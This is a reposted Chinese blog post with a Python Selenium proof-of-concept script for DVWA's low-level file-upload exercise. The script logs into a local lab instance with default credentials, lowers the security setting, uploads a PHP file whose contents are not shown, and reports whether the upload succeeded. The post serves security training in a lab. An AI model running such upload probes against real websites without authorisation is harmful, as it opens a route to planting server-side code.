其他分享
首页 > 其他分享> > POC——DVWA's File Upload

POC——DVWA's File Upload

作者:互联网

Level——low

最近了解了一下python的selenium,干脆用它写一个POC吧~

 1 from selenium.webdriver import Chrome
 2 from selenium.webdriver.support.ui import WebDriverWait
 3 from selenium.webdriver.common.by import By
 4 from selenium.webdriver.support.select import Select
 5 import time
 6 
 7 driver = Chrome()
 8 driver.get("http://192.168.117.130/DVWA-1.9/login.php")
 9 WebDriverWait(driver,10).until(lambda d:"Login" in d.title)
10 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[1]').send_keys("admin")
11 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[2]').send_keys("password")
12 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/p/input').click()
13 
14 driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[3]/li[1]').click()
15 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/select').click()
16 loc = (By.XPATH,'//*[@id="main_body"]/div/form/select')
17 ele = driver.find_element(*loc)
18 s = Select(ele)
19 s.select_by_value("low")
20 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/input[1]').click()
21 
22 driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[2]/li[5]').click()
23 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[2]').send_keys('F:\Python\Project\POC\POC(Proof Of Concept)\one.php')
24 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[3]').click()
25 response = driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/pre')
26 
27 re = 'one.php'
28 flag=re in str(response.text)
29 
30 if flag:
31     print("It looks likely vulnerable")
32 else:
33     print("It is strong")
34 
35 driver.close()

 

标签:XPATH,driver,DVWA,POC,find,File,div,element,id
来源: https://www.cnblogs.com/wavesky/p/16371619.html